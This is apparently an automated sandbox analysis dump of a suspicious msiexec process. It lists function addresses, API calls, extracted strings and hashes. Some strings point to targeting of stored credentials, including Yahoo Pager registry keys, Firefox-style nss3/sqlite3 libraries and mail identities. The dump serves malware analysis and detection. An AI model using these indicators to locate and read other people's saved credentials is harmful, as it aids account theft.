                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: _mbsicmp$??2@??3@atoistrlen
                      • String ID:
                      • API String ID: 4107816708-0
                      • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                      • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                      • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                      • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                      APIs
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                      • _gmtime64.MSVCRT ref: 00411437
                      • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                      • strftime.MSVCRT ref: 00411476
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                      • String ID:
                      • API String ID: 1886415126-0
                      • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                      • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                      • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                      • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: strlen
                      • String ID: >$>$>
                      • API String ID: 39653677-3911187716
                      • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                      • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                      • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                      • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                      APIs
                      • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                      • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                      • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID: @
                      • API String ID: 3510742995-2766056989
                      • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                      • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                      • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                      • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: _strcmpi
                      • String ID: C@$mail.identity
                      • API String ID: 1439213657-721921413
                      • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                      • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                      • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                      • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                      APIs
                      • memset.MSVCRT ref: 00444573
                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: QueryValuememset
                      • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                      • API String ID: 3363972335-1703613266
                      • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                      • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                      • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                      • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                      APIs
                      • memset.MSVCRT ref: 00406640
                        • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                        • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                        • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                      • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                      • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpy$memset$memcmp
                      • String ID: Ul@
                      • API String ID: 270934217-715280498
                      • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                      • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                      • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                      • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                      APIs
                        • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                      Strings
                      • recovered %d pages from %s, xrefs: 004188B4
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                      • String ID: recovered %d pages from %s
                      • API String ID: 985450955-1623757624
                      • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                      • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                      • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                      • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: _ultoasprintf
                      • String ID: %s %s %s
                      • API String ID: 432394123-3850900253
                      • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                      • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                      • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                      • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                      APIs
                      • LoadMenuA.USER32(00000000), ref: 00409078
                      • sprintf.MSVCRT ref: 0040909B
                        • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                        • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                        • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                        • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                        • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                        • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                        • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                      • String ID: menu_%d
                      • API String ID: 1129539653-2417748251
                      • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                      • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                      • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                      • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                      APIs
                      Strings
                      • failed memory resize %u to %u bytes, xrefs: 00411706
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: _msizerealloc
                      • String ID: failed memory resize %u to %u bytes
                      • API String ID: 2713192863-2134078882
                      • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                      • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                      • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                      • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                      APIs
                        • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                      • strrchr.MSVCRT ref: 00409808
                      • _mbscat.MSVCRT ref: 0040981D
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: FileModuleName_mbscatstrrchr
                      • String ID: _lng.ini
                      • API String ID: 3334749609-1948609170
                      • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                      • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                      • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                      • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                      APIs
                      • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                      • _mbscat.MSVCRT ref: 004070FA
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: _mbscat$_mbscpystrlen
                      • String ID: sqlite3.dll
                      • API String ID: 1983510840-1155512374
                      • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                      • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                      • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                      • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                      APIs
                      • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: PrivateProfileString
                      • String ID: A4@$Server Details
                      • API String ID: 1096422788-4071850762
                      • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                      • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                      • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                      • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                      APIs
                      • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                      • memcpy.MSVCRT(?,?,?), ref: 0042C917
                      • memset.MSVCRT ref: 0042C932
                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpy$memset
                      • String ID:
                      • API String ID: 438689982-0
                      • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                      • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                      • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                      • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                      APIs
                      • strlen.MSVCRT ref: 0040849A
                      • memset.MSVCRT ref: 004084D2
                      • memcpy.MSVCRT(?,00000000,?,?,?,?,68147B60,?,00000000), ref: 0040858F
                      • LocalFree.KERNEL32(00000000,?,?,?,?,68147B60,?,00000000), ref: 004085BA
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: FreeLocalmemcpymemsetstrlen
                      • String ID:
                      • API String ID: 3110682361-0
                      • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                      • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                      • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                      • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                      APIs
                      • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                      • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                      • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                      • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID:
                      • API String ID: 3510742995-0
                      • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                      • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                      • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                      • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8